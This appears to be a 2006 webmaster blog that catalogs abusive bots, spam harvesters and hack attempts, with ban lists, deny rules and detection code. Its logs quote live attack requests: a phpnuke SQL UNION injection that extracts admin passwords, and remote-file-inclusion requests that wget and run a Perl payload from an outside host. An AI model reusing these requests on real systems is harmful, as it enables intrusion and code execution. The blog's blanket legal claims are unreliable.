If this is not some strange proxy then this is a new bot.

This is banned by BB as an invalid Windows version.
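Spotting a useragent that "starts over" like this one can be sketched very simply in Python. The function name `has_nested_user_agent` is made up for illustration. A hit does not prove a bot, since it could still be a strange proxy, so it is better used to flag agents for a closer look.

```python
def has_nested_user_agent(user_agent):
    """Return True when the product token 'Mozilla/' appears more than once."""
    return user_agent.lower().count("mozilla/") > 1
```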

88.198.38.230 proxy.adressendeutschland.de harvester

www.adressendeutschland.de
88.198.38.230 proxy.adressendeutschland.de

This bot is a Spammers dream. It is creating a database of all websites
NAME ADDRESS PHONE# & EMAIL ADDRESS Once finished it will have a search option to look up the data.

This is why you should not post your name address and phone# on your website. Give this data only to customers who place orders. Or require a customer to have an account before its displayed. New customers only need a contact form.

It claims it will not display anyone not in a "Trade Register". I don't know what that is, but if it's true why are they scanning non-business websites?

Read the translation of what they are doing here.

Email/contact info harvester.

Sep 20, 2006

hostnoc.net abuse

mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)
83 hits From 6419136165.hostnoc.net 64.191.36.165

The above is one of the suspected useragents that always turns out to be a robot and not a browser. A Google search shows a lot of abuse from this domain, so it's banned.


domain ban list

hostnoc.net,pro spam host

Sep 19, 2006

LWP::Simple/5.48 FastCounter Robot using LWP

LWP::Simple/5.48
204.71.191.109

The bcentral FastCounter sends out a robot to check your link and verify your site. However, this robot doesn't have its own useragent. It uses "LWP::Simple/5.48", which is banned by most everyone as a spambot.

Attempts to report this failed because both the chat and email contact forms do not work on the fc.bcentral.com site. I also just discovered that FastCounter free is no longer free unless you had already created your counters before 2005. I have about 15 such counters, so mine are still working.


If you have trouble with your counters not working you will have to add the above ip to the whitelist.

Just what is blogslive - Admitted Data-Miner

blogslive (info@blogslive.com)
64.158.138.84 floodgate.intelliseek.com

Blogslive will visit your blog the same day you create it.
blogslive.com is just a GoDaddy parked webpage; no such site exists.
The website intelliseek.com also does not exist it redirects to nielsenbuzzmetrics.com

To quote this website.
With solid data-mining technology, superb research and Nielsen’s unrivaled experience in media measurement and client services, we help today’s companies, brands and business professionals better understand the influence and impact of CGM on products, issues, reputation and image.


So the blogslive is what I suspected all along its a fake robot for nielsenbuzzmetrics.com used to data-mine your website so they can sell your content to others. Can you say copyright violation?


Banned Banned Banned....................

64.233.182.136 fakes google

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Google Wireless Transcoder;)
64.233.182.136


This IP was caught faking the Google proxy, which is banned anyway because it's a proxy.

Sep 17, 2006

enmaxenvision.net dragonfly bot

dragonfly(ebingbong@playstarmusic.com)
72.29.233.186 a72-29-233-186.enmaxenvision.net

enmaxenvision.net redirects to enmax.com. Enmax has something to do with utilities; I can't tell what they are, but they are not an ISP and should not be running a robot.

Both the domain and useragent should be banned.



enmaxenvision.net,Email harvestor

stpxc02.sentechsa.net spam tool

isc systems irc search 2.1
168.210.90.181 stpxc02.sentechsa.net

Caught this spam harvester running on a domain that has no website.



Add to domain ban
sentechsa.net,Spam Email Harvestor

wmstream.libertyleague.com SpamBot

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
69.41.171.138 wmstream.libertyleague.com

This is a MLM company. Could not find any tracks in google must be a new spambot they have started up this week.


This domain should be added to the ban list.

I do see a court settlement on pyramid marketing here

Domain ban
libertyleague.com,MLM co running Unknown Bot

Sep 13, 2006

ns1.downriterotten.com abuse

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
72.232.31.82 ns1.downriterotten.com

Yes the above useragent is one of the known spam tools.
This domain has a page saying they will be back up soon while a google of the domain shows posting on adult webmaster forums.

This domain is banned for using spam tools.



downriterotten.com,Caught using spam tools

Sep 12, 2006

trishuli.cs.UMBC.EDU spambot

Java/1.5.0_02
130.85.94.152 trishuli.cs.UMBC.EDU

This is known spam software used to harvest email addresses.
It is running in the Computer Science Dept of the University of Maryland, Baltimore County (UMBC).

This has been reported.

static.88-198-43-39.clients.your-server.de bot

88.198.43.39 static.88-198-43-39.clients.your-server.de

From Germany has no agent.


Its not clear what this bot is trying to do. Its always on the same IP and only hits the top page.

dynamic.apogeenet.net Guestbook Spammer

ADD Spam robot Trap
mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)
64.192.20.104 dynamic.apogeenet.net

After doing a search I see that this domain often turns up on guestbooks posting spam so this domain is now added to the domain block.

dynamic.apogeenet.net,Guestbook Spammer

IRLbot/2.0 bot banned

Request : /contact.html
IP : 128.194.135.81
Agent : IRLbot/2.0 (compatible; MSIE 6.0; http://irl.cs.tamu.edu/crawler)

This bot didn't make it into the site. It went straight to an old contact form that had been removed due to spam and hit it 7 times.


This bot was banned long ago for being a waste of bandwidth, since it only takes our bandwidth and gives nothing back.

To quote the website.
"Texas A&M research project sponsored in part by the National Science Foundation that investigates algorithms for mapping the topology of the Internet and discovering the various parts of the web."
That's great and all, but Texas A&M needs to use its own bandwidth for this project and not ours.

Mozilla/5.0 Agent by itself

Agent: Mozilla/5.0
218.209.235.203
Agent: Mozilla/5.0
195.42.75.75
Agent: Mozilla/5.0
203.153.45.50

As you can see the same bot hit from 3 places one after another.

I have seen this before being used by the hackers it is clearly some type of hack tool or script.

To prevent false alarms this cannot be added to the useragent ban list; it must be hard coded as an exact match, which will be done in the next release of MMAUTOBAN, v3.3.
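The difference between an exact match and the normal ban list can be shown with a minimal Python sketch. This is not the MMAUTOBAN code; the names `EXACT_BANNED_AGENTS` and `is_exact_banned` are made up for illustration.

```python
# Agents that are banned only when they are the entire useragent string.
EXACT_BANNED_AGENTS = {"mozilla/5.0"}

def is_exact_banned(user_agent):
    """Return True only if the whole useragent equals a banned string."""
    return user_agent.strip().lower() in EXACT_BANNED_AGENTS
```

A substring or starts-with check for "Mozilla/5.0" would ban every Firefox user, which is the false alarm the exact match avoids.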

Sep 11, 2006

sproose/0.1 (the Sproose Goose bot)

GET HTTP/1.0
Agent: sproose/0.1 (sproose bot; http://www.sproose.com/bot.html; crawler@sproose.com)
from Ips
38.100.225.7
38.100.225.8
38.100.225.12
Most likely others but we are not keeping track.


The Sproose Goose is banned because it's a startup with no content. Scrapers often use the fake startup scam to get past blocks. Unless the Sproose Goose actually does fly, they will stay banned. Right now we do not know if this is a real company or a scraper.

The robot was caught following links it should not be able to see because it's banned. The only way it could be doing what it's doing is if it were following Google listings back to our site.

Added to UA Start file
sproose/0.1,Fake Startup co

Sep 9, 2006

201.200.22.146 Hacker

ADD ALARM: */select/* injection
modules.php?name=Search&type=comments&%20%20%20query=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0-0-pwd-0-aid/**/FROM/**/nuke_authors GET HTTP/1.1
Agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; simbar enabled; simbar={ff31d371-c0bf-4f98-ac32-ccaee7d5f828})
201.200.22.146

The above attempted union injection hack of the phpnuke database was detected and the IP autobanned by M&M Autoban.
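For anyone wondering how a request like that can be spotted, here is a minimal sketch in Python. It is not the M&M Autoban code. It assumes the check works on the raw request string, and the name looks_like_union_injection is made up for this example. The idea is to undo the URL encoding, replace the /**/ comments the attacker used in place of spaces, and then look for UNION followed by SELECT.

```python
import re
from urllib.parse import unquote

# SQL comments such as /**/ are commonly used in place of spaces to dodge filters.
_SQL_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
_UNION_SELECT = re.compile(r"\bunion\s+(all\s+)?select\b", re.IGNORECASE)


def looks_like_union_injection(request_uri):
    """Return True when the request contains a UNION ... SELECT pattern."""
    decoded = unquote(request_uri)                # turn %20 etc. back into characters
    normalized = _SQL_COMMENT.sub(" ", decoded)   # /**/ becomes a plain space
    return bool(_UNION_SELECT.search(normalized))


if __name__ == "__main__":
    logged = ("modules.php?name=Search&type=comments&%20%20%20query=&%20%20%20query="
              "loquesea&instory=/**/UNION/**/SELECT/**/0-0-pwd-0-aid/**/FROM/**/nuke_authors")
    print(looks_like_union_injection(logged))
    print(looks_like_union_injection("modules.php?name=Search&query=student+union"))
```

A pattern check like this is only one layer. It can miss other encodings, so it should not be the only thing standing between a request and the database.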



One wonders why I am seeing a lot of hackers with simbar enabled in the user agent.
None of my regular visitors have simbar.

Sep 7, 2006

microsoft.com spoofed?

Blacklist Domain Ban: microsoft.com Entire range spoofed by hackers
Agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.2; wow64; sv1)
131.107.0.96 tide526.microsoft.com

Word is that someone is using Microsoft IPs.

One would think MS would be using MSIE 7 if it was real.

Update: I started seeing what looked like valid users, so this domain was removed from the ban list but is being watched.

Bad Behavior Whitelist adjustment

Bad Behavior has some problems with known good bots. You need to adjust your whitelist to let them in.

Edit whitelist.php and change $bb2_whitelist_ip_ranges to:

$bb2_whitelist_ip_ranges = array(
// Looksmart
"64.242.88.60",
// Scooter/3.3
"66.94.232.246",
"66.94.238.51",
"66.94.238.52",
// YahooSeeker/1.2
"68.142.230.184",
// FreeFindRobot Good bot with some header problems
"63.203.65.217",
// CJ.com banner tester
"216.34.209.23",
);

These are known bots that BB blocks due to header problems. Without this change, AltaVista's Scooter will not be able to index your site.
CJ.com has been added because the new robot they use is blocked as a spambot.
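To show what a whitelist lookup like this amounts to, here is a small Python sketch. It is not how Bad Behavior itself does the check. The function name is_whitelisted is made up, and accepting CIDR ranges such as 10.1.2.0/24 is a feature of this sketch only.

```python
import ipaddress

# The same addresses as in the whitelist above.
WHITELIST = [
    "64.242.88.60",    # Looksmart
    "66.94.232.246",   # Scooter/3.3
    "66.94.238.51",
    "66.94.238.52",
    "68.142.230.184",  # YahooSeeker/1.2
    "63.203.65.217",   # FreeFindRobot
    "216.34.209.23",   # CJ.com banner tester
]


def is_whitelisted(ip, entries=WHITELIST):
    """Return True when ip equals a listed address or falls inside a listed range."""
    addr = ipaddress.ip_address(ip)
    # A single address is parsed as a /32 network, so both forms work here.
    return any(addr in ipaddress.ip_network(entry, strict=False) for entry in entries)


if __name__ == "__main__":
    print(is_whitelisted("216.34.209.23"))
    print(is_whitelisted("66.17.15.154"))
```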

security.lightspeedsystems.com abuse

bad-behavior 400 Required header 'Accept' Missing.
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
66.17.15.154 66-17-15-154.security.lightspeedsystems.com

Thought to be a scraper. See other info here

Reports now say that this is content filtering.
lightspeedsystems.com
If it is, it's the worst bot ever written, because it fakes its useragent and sends invalid headers. Clearly not the tech leader the website says it is.

Writing to Lightspeed and waiting for a reply.

Update:
lightspeedsystems.com refuses to reply to my emails, so it's banned. I don't care what they say it is. It is abuse because they are faking the useragents, using improper headers, and not identifying themselves in the scan.
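The "Required header 'Accept' Missing" block in the log above comes down to a simple consistency test: real browsers send an Accept header, so a request that claims to be a browser but lacks one is suspect. Here is a minimal Python sketch of that idea. It is an illustration only and not Bad Behavior's actual logic; the function name check_headers and the rule that anything starting with "mozilla/" claims to be a browser are assumptions.

```python
def check_headers(headers):
    """Return (status, reason) for a dict of request headers."""
    # Header names are case-insensitive, so normalize them first.
    lowered = {name.lower(): value for name, value in headers.items()}
    agent = lowered.get("user-agent", "").lower()
    claims_browser = agent.startswith("mozilla/")  # assumption for this sketch
    if claims_browser and "accept" not in lowered:
        return 400, "Required header 'Accept' missing"
    return 200, "OK"


if __name__ == "__main__":
    fake = {"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"}
    print(check_headers(fake))
    print(check_headers({**fake, "Accept": "*/*"}))
```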


added domain ban
lightspeedsystems.com,Wont reply to emails abuse

Also banned by all blogs using Bad Behavior.

Sep 6, 2006

nat.la.valueclick.com Java/1.5.0

Java/1.5.0_06
64.70.54.15 nat.la.valueclick.com
cjnetworkquality; http://www.cj.com/networkquality
64.70.54.15 nat.la.valueclick.com

Java/1.5.0_03
216.34.209.23 mx4.cj.com

Valueclick and cj.com are the same company. It is unclear why they are using this useragent. It is blocked as a known spam tool, and they should not be using it.

This has been reported to valueclick and cj.com.

UPDATE
After 1 month, CJ sent this reply about the broken useragent string:

For further details, regarding our Network Insight Spider, please access the following URL:
http://www.cj.com/networkquality/


Well....... Hummm what am I to say to that answer?

And people wonder why customer service people have a bad rep.

What to do.
This looks like a legit bot that needs to be let in, however CJ would not say whether it was the real CJ bot or not.
The IP needs to be added to the whitelist in BB and M&M Autoban. However, I have not seen it this month, so it may be fixed. Will have to wait and see.

But anyway, there is no point in writing to them again. All they gave me after 1 month was the URL that's in the normal useragent string.

How to protect your site

Protect your website in realtime.
As seen on PC Magazine

Protect your PHP site and scripts from bad abusive robots that use up your bandwidth.

Have you checked your logs only to find you have more robots or unknown users than real visitors?

Examples of what is visiting your site:
Robots watching to see if your domain expires
Robots from some startup search engine no one will ever use
Robots from search engines in languages you don't serve
Robots from companies trying to see if you violated some copyright
Robots from some government website monitoring for some unknown content
Robots trying to collect email addresses
Robots trying to hack into your site
Robots pinging your scripts in an attempt to get your software to list where they came from
Robots probing for scripts called modules.php, posting.php, submit.php and others
Robots using random agents to avoid blocking
Hackers trying to use union injections on your database

Copyright owners have the legal right under the DMCA to restrict the viewing of content to website visitors only. Webmasters have the legal right under the DMCA to block access to anyone who wants to store or copy website content. It is also a crime under US law to use any trick or false information to gain access to a computer system. Running a robot that pretends to be a user by faking its useragent is a crime under US law because it is using false information to gain access to a computer system.


M&M Autoban can be used as a Bot-Trap to autoban every IP that hits a trap listed in your robots file. It is included in all of your PHP scripts, where it checks the visitor against the IP ban list and then verifies that the visitor qualifies to visit your website.
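The bot-trap idea can be sketched in a few lines. This is an illustration in Python only, not the M&M Autoban code. The class name BotTrap, the trap path /bot-trap/ and the in-memory ban set are all assumptions made for the example. The trap path is one you list under Disallow in your robots file, so anything that requests it has ignored the file.

```python
class BotTrap:
    """Ban every IP that requests a path the robots file told it to stay out of."""

    def __init__(self, trap_paths):
        self.trap_paths = tuple(trap_paths)  # hypothetical Disallow'd trap paths
        self.banned_ips = set()              # a real script would persist this list

    def handle(self, ip, path):
        """Return the HTTP status to send for this request."""
        if ip in self.banned_ips:
            return 403                       # banned: stop early, send almost nothing
        if path.startswith(self.trap_paths):
            self.banned_ips.add(ip)          # hit the trap: ban from now on
            return 403
        return 200


if __name__ == "__main__":
    trap = BotTrap(["/bot-trap/"])
    print(trap.handle("203.0.113.9", "/index.php"))
    print(trap.handle("203.0.113.9", "/bot-trap/emails.html"))
    print(trap.handle("203.0.113.9", "/index.php"))
```

Checking the ban list first keeps the cost of a banned visitor to a single lookup.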

You cannot just send spam bots into an endless fake email loop unless you have unlimited bandwidth and don't care about a slow server. It doesn't hurt them anyway. A spam bot must be terminated ASAP, using as little bandwidth as possible.


Works with Bad Behavior, but BB is not required.

Works on all PHP scripts, needs no database!
Prevents union injections and known hacks.
Tracks agents.
Set the blocking list any way you like.

Now works with WordPress.

Click on downloads to the right.

csccorporatedomains.com abuse Corp. Snooper

Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]
64.124.14.107 csccorporatedomains.com
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]
64.124.14.126 csccorporatedomains.com
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; DigExt)
64.124.14.126 csccorporatedomains.com
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040218 Galeon/1.3.12
64.124.14.120 csccorporatedomains.com
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]
64.124.14.120 csccorporatedomains.com
Mozilla/5.0 (compatible; Konqueror/3.1; Linux; en)
64.124.14.120 csccorporatedomains.com
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; DigExt)
64.124.14.120 csccorporatedomains.com

All of the above were blocked by Bad Behavior as having defective headers.
Only 1 old win95 bot gets past BB, but it is blocked by our domain ban.
mozilla/4.7 [en] (win95; u)
64.124.14.120 csccorporatedomains.com
mozilla/4.7 [en] (win95; u)
64.124.14.124 csccorporatedomains.com


This has now all been tracked back to a service called "Brand Audit and Patrol". It visits our sites to see if we are saying bad things about brand names and to check if we have brand logos.

The problem is that they are using a defective robot that is blocked by all blogs that use Bad Behavior. It's likely that this patrol bot cannot even see 60% of the blogs it's trying to scan due to poor programming.

Also, this robot fakes useragents to gain access to websites in violation of US federal law, which makes it a crime to use false information or any trick to gain access to a computer system.

This domain is banned for wasting bandwidth and using false information and tricks to gain access to website content.

csccorporatedomains.com,brand audit patrol
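The log above shows the giveaway: one IP coming in under several different browser names. Here is a small Python sketch of how that can be picked out of a list of hits. The function names and the threshold of 3 distinct agents are assumptions for this example, not a rule taken from any of the tools mentioned here.

```python
from collections import defaultdict


def agents_per_ip(hits):
    """Group (ip, useragent) pairs into a mapping of ip -> set of agents seen."""
    seen = defaultdict(set)
    for ip, agent in hits:
        seen[ip].add(agent)
    return seen


def rotating_ips(hits, threshold=3):
    """Return the IPs that used at least `threshold` different useragents."""
    return sorted(ip for ip, agents in agents_per_ip(hits).items()
                  if len(agents) >= threshold)


if __name__ == "__main__":
    opera = "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]"
    digext = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; DigExt)"
    galeon = "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040218 Galeon/1.3.12"
    konqueror = "Mozilla/5.0 (compatible; Konqueror/3.1; Linux; en)"
    hits = [
        ("64.124.14.107", opera), ("64.124.14.126", opera), ("64.124.14.126", digext),
        ("64.124.14.120", galeon), ("64.124.14.120", opera),
        ("64.124.14.120", konqueror), ("64.124.14.120", digext),
    ]
    print(rotating_ips(hits))
```

A shared proxy can also show several agents from one IP, so a hit from this check is a reason to look closer and not proof on its own.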

ip.secureserver.net Funny

64.202.160.65
Blacklist Domain Ban: ip.secureserver.net Godady web hosting -
Unknown bots
http://www.google.com/search?hl=en&q=robot+blocking+scripting

Agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)

Domain: nat-64-202-160-65.ip.secureserver.net


secureserver.net doesn't have a website. It redirects to http://www.securepaynet.net/gdshop/404error.asp, which is GoDaddy's payment service.

How does someone run Windows on a GoDaddy server? They don't. It's a bot, and it's scanning for info on who is blocking bots. Funny. What does this tell you?

We were banning just part of this domain but now suggest banning the entire thing.



secureserver.net,Godady web hosting - Unknown bots
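Banning "the entire thing" means matching the end of the visitor's hostname against the banned domain. Here is a minimal Python sketch, assuming the ban list is kept as "domain,reason" lines like the entry above. The function names parse_ban_list and find_ban are made up, and this is not the M&M Autoban code.

```python
def parse_ban_list(text):
    """Parse 'domain,reason' lines into a dict of domain -> reason."""
    bans = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        domain, _, reason = line.partition(",")  # split on the first comma only
        bans[domain.strip().lower()] = reason.strip()
    return bans


def find_ban(hostname, bans):
    """Return the ban reason if hostname is a banned domain or any subdomain of one."""
    host = hostname.lower().rstrip(".")
    for domain, reason in bans.items():
        # Require a dot before the domain so notsecureserver.net is not caught.
        if host == domain or host.endswith("." + domain):
            return reason
    return None


if __name__ == "__main__":
    bans = parse_ban_list("secureserver.net,Godady web hosting - Unknown bots\n"
                          "csccorporatedomains.com,brand audit patrol\n")
    print(find_ban("nat-64-202-160-65.ip.secureserver.net", bans))
    print(find_ban("notsecureserver.net", bans))
```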

Panscient Data Services

38.99.203.110 Panscient_Data_Services.demarc.cogentco.com

Originally the bot was detected scanning the site using a fake useragent. This was reported to cogentco.com, who sent back a canned reply that this was a nice bot and followed the robots file.

My original request for info on who ran the bot and why it was faking a browser useragent was ignored.

I replied to abuse and asked if cogentco.com owned this bot and why it was using a fake useragent if it was a nice bot. But my questions were ignored, and all I got back was the same canned reply.

cogentco.com knows about this bot, allows it to operate, hides the identity of its owner and ignores complaints about it.

This bot was built by www.panscient.com. It is unclear if they own it.

At Panscient Technologies we design, build and operate custom internet search engines that unlock the hidden structure of web data.
Using state of the art AI technology, Panscient Technologies' software analyzes web sites for their information content and compiles the data into a searchable index.


Yeah right, state of the art scraping.

At this time it is unclear who else uses this bot, because it's stealth.

Add to domain ban list
Panscient_Data_Services.demarc.cogentco.com,Abuse

or to the ip ban on your server 38.99.203.110

nodomaintransfer21.com Singapore peepsurf.com

NO AGENT-
66.139.76.245 nodomaintransfer21.com

This domain redirects to peepsurf.com, which is a proxy. Since the URL being attempted was one that spammers hit, I suspect they were trying to get by my blocks. I don't know why the spam never gets posted even when they get past the block. Lamers....

I tested this proxy by taking it to the bot trap and got this:

210.193.49.199 199.210-193-49.idc-colo.qala.com.sg It passed my useragent.

I cannot tell where they got nodomaintransfer21.com from. It did not come from that proxy, so they must be running more than one. Both need to be banned.

See post on guestbook spammer running on nodomaintransfer22.com

Domain Ban.
idc-colo.qala.com.sg,Singapore peepsurf.com proxy
nodomaintransfer21.com,Singapore peepsurf.com proxy

Union Injection hackers

Ever since I posted about my new anti union injection module, hackers have been trying to hack my forums. Someone tell me something. Perhaps I don't understand this, but why would a hacker show me just how he hacks a site, so I can take that info and adjust my script to block such hacks?

All his attempts were blocked, even by my alpha script.

modules.php?basepath=http://paupal.info/folder/cmd1.gif?&cmd=cd%20/tmp/;wget%20http://paupal.info/folder/phpnuke.txt;perl%20phpnuke.txt;rm%20-rf%20phpnuke.*? GET HTTP/1.0
Agent: mozilla/5.0
212.55.218.196 hypernet.ch

modules.php?basepath=http://paupal.info/folder/cmd.txt?&cmd=cd%20/tmp/;wget%20http://paupal.info/folder/mambo1.txt;perl%20mambo1.txt;rm%20-rf%20mambo1.*? GET HTTP/1.0
Agent: mozilla/5.0
212.55.218.196 hypernet.ch

modules.php?basepath=http://expl0itz.com/cmd.txt?&cmd=cd%20/tmp/;wget%20http://paupal.info/folder/mambo2.txt;perl%20mambo2.txt;rm%20-rf%20mambo2.*? GET HTTP/1.0
Agent: mozilla/5.0
212.55.218.196 hypernet.ch

modules.php?basepath=http://paupal.info/folder/cmd.txt?&cmd=cd%20/tmp/;wget%20http://paupal.info/folder/mambo2.txt;perl%20mambo2.txt;rm%20-rf%20mambo2.*? GET HTTP/1.0
Agent: mozilla/5.0
212.55.218.196 hypernet.ch


hypernet.ch is banned
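All of the requests above have one thing in common: a parameter (basepath) whose value is a URL on someone else's server, which the attacker hopes the script will include and run. Here is a minimal Python sketch for flagging that. It is not the alpha script mentioned above, and the function name remote_include_params is made up for this example.

```python
import re
from urllib.parse import parse_qsl

# A parameter value that begins with a remote URL scheme.
_REMOTE_URL = re.compile(r"^\s*(https?|ftp)://", re.IGNORECASE)


def remote_include_params(request_uri):
    """Return the names of query parameters whose value starts with a remote URL."""
    _, _, query = request_uri.partition("?")  # everything after the first '?'
    return [name
            for name, value in parse_qsl(query, keep_blank_values=True)
            if _REMOTE_URL.match(value)]


if __name__ == "__main__":
    logged = ("modules.php?basepath=http://paupal.info/folder/cmd.txt?&cmd=cd%20/tmp/;"
              "wget%20http://paupal.info/folder/mambo1.txt;perl%20mambo1.txt;"
              "rm%20-rf%20mambo1.*?")
    print(remote_include_params(logged))
    print(remote_include_params("modules.php?name=Search&query=hello"))
```

Some scripts legitimately take a URL as a parameter, for example a redirect target, so a check like this needs a list of parameters that are allowed to hold one.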

Here is part of his IRC script code.
my $linas_max='4';
my $sleep='5';
my @adms=("xxxxx","ok","mos","KKTeam");
my @canais=("#phpnuke");
my $nick='shutup';
my $ircname ='Stop';
chop (my $realname = 'uname -rs');
$servidor='mushu.tetovalive.de' unless $servidor;
my $porta='8200';

sitescripts.com link checker

sitescripts.com link checker
66.113.130.183 lsh158.siteprotect.com

This bot looks like it's using a link checker downloaded from sitescripts.com.

I think this is a scraper. Whatever it is, it's pretending to be sitescripts.com.

siteprotect.com has no website, so it's suspect right out of the box.

It's banned by agent and domain.

coli.uni-saarland.de / answerbus bot

This bot first came in using an agent for a text browser. Clearly fake.

lynx/2.8.5dev.16 libwww-fm/2.14 ssl-mm/1.4.1 openssl/0.9.7a
134.96.104.226 cluster-7.coli.uni-saarland.de

After a week they changed user agents to:

answerbus (http://www.answerbus.com/)
134.96.1.195 answerbus.coli.uni-saarland.de

Now they are back to using a fake text browser agent. Perhaps it's 2 bots.
lynx/2.8.5dev.16 libwww-fm/2.14 ssl-mm/1.4.1 openssl/0.9.7a
134.96.104.221 cluster-2.coli.uni-saarland.de

lynx/2.8.5dev.16 libwww-fm/2.14 ssl-mm/1.4.1 openssl/0.9.7a
134.96.104.220 cluster-1.coli.uni-saarland.de



It often came in with referers that tracked back to its scraper site.
134.96.1.195 answerbus.com answerbus.de uni-saarland.de

All of these websites have the same thing on them. It looks like a search system and even says "supported by research grants from .....". I don't know if that's true. If it is, they should ask for the money back. Unless they support scrapers?

I tested this search system using the keywords for my sites. What I found were listings with my text and site name that looked like links to my site, but clicking on them took me to other scraper linking sites.

This thing is banned by domain and user agent.


Update: the bot is getting very active. I suggest adding it to the server IP ban:

deny from 134.96.104.226
deny from 134.96.104.221
deny from 134.96.104.220
deny from 134.96.1.195

blogsearchbot-pumpkin-2

blogsearchbot-pumpkin-2 GET HTTP/1.0
85.10.211.195 85-10-211-195.clients.your-server.de

I don't know what pumpkin is, but it's banned.

They say it doesn't read robots. I don't care. With no idea what it is, it's banned.

Sep 5, 2006

upc-a.chello.nl abuse

wells search ii
62.163.12.132 a12132.upc-a.chello.nl
wells search ii
62.163.32.222 a32222.upc-a.chello.nl
wells search ii
62.194.120.227 h120227.upc-h.chello.nl



Have been seeing a lot of this spam harvester running on chello.nl.

Also turned up at chello084112114199.33.11.vie.surfer.at

This is a known spam harvester.

SuperCleaner 2.84

What is this useragent?
Mozilla/4.0 (compatible; SuperCleaner 2.84; Windows NT 5.1)

SuperCleaner 2.84 is a disk cleaner so why is it trying to visit my site?
24.147.48.201 c-24-147-48-201.hsd1.ma.comcast.net


Bad Behavior is blocking it due to incorrect format.

Unless I can find out what SuperCleaner 2.84 is it will be added to the block list.

Welcome

Welcome to the new Blog. I had to move from the forum over to here because of all the attempts to hack the forum software.

All the old posts from the forum had to be purged so I could get them out of the Google index.

I will attempt to repost the major ones here.